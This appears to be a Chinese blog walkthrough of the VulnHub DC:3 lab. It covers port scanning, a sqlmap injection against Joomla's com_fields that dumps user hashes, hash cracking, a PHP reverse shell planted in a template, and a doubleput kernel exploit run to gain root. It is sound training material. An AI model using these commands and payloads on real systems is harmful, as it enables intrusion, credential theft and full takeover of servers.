VulnHub DC:3

nmap扫描起手

nmap -sT 192.168.1.91 -p - -sV -O -sC

在这里插入图片描述
只开了80,上去看看。nmap 用脚本扫出了这是一个Joomla构建的网站。
在这里插入图片描述
信息很少,但至少知道一个账号admin。先用joomscan扫一下看看。
kali 中没有joomscan,去github上下载一下。
https://github.com/rezasp/joomscan

git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl -u 192.168.1.91

在这里插入图片描述
发现了管理后台页面,还有Joomla的版本。先看看这个版本有没有漏洞。
在这里插入图片描述
存在一个sql注入漏洞。看一下这个漏洞利用文件。

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

在这里插入图片描述
那就用sqlmap.

sqlmap -u "http://192.168.1.91/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

执行后返回,由于数据库登陆入口,先对joomladb数据库进行操作在这里插入图片描述
接下来是,把上面的–dbs 改成–tables -D joomladb指定数据库。
在这里插入图片描述
发现了几个user表。看一下users
-T users -D joomladb --columns
在这里插入图片描述
我没想到他没枚举出列名来。
我发现我前面的表名指定错了。。。。。。
再跑一次吧,哈。

sqlmap -u "http://192.168.1.91/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T '#__users' --column

在这里插入图片描述
果然安全是个细活。

sqlmap -u "http://192.168.1.91/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T '#__users' -C id,password,username --dump

在这里插入图片描述
用hash-identifier 无法识别,这串hash.hashcat -m 400 类型的joomla,提示长度不对。
最后我在https://hashcat.net/wiki/doku.php?id=example_hashes
找到一个类似格式的hash
在这里插入图片描述
保存hash值后破解。

hashcat -a 0 -m 3200 ./2.hash  /usr/share/wordlists/rockyou.txt

在这里插入图片描述
登陆后台看看。看看有没有上传代码或者执行代码的地方。
在joomal的后台中可以编辑模板的PHP代码。可以自行搜索 joomla shell。
在这里我们利用Beez3详细信息和文件之一
在这里插入图片描述
在这里插入图片描述
这里的话,选任何一个PHP页面都可以,关键是你要知道路径。
在这里插入图片描述这里的路径实际上是/templates/beez3/html/
如果不知道路径,可以用gobuster这样的工具去爆破目录。
上传反弹shell

/usr/share/webshells/php/php-reverse-shell.php 

用kali自带的反弹shell
在这里插入图片描述

nc -lvp 4444

在这里插入图片描述
在这里插入图片描述
python升级shell

python -c "import pty;pty.spawn('/bin/bash')"

提权。
看来没有suid提权,也不能用su,sudo.
那看看内核吧。

uname -a
cat /etc/lsb-release

在这里插入图片描述

利用工具linux-exploit-suggester,枚举内核漏洞。
https://github.com/mzet-/linux-exploit-suggester
我kali机上以及下好了,所以建立一个web服务器,让靶机下载。

 python -m SimpleHTTPServer 80
 cp les.sh /var/www/html/

提示权限拒绝。换到/tmp目录就好了。
在这里插入图片描述
在这里插入图片描述

chmod +x les.sh

在这里插入图片描述
我选择了这个进行尝试。去下载他的poc
kali下载后我把他移动到web目录下进行下载。

unzip 39772.zip
cd 39772
tar -xvf exploit.tar

在这里插入图片描述
提示警告在doubleput.c,但实际上仍然是起作用的。
运行 ./doubleput
在这里插入图片描述
okok,我们现在是root
在这里插入图片描述
拿到flag。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值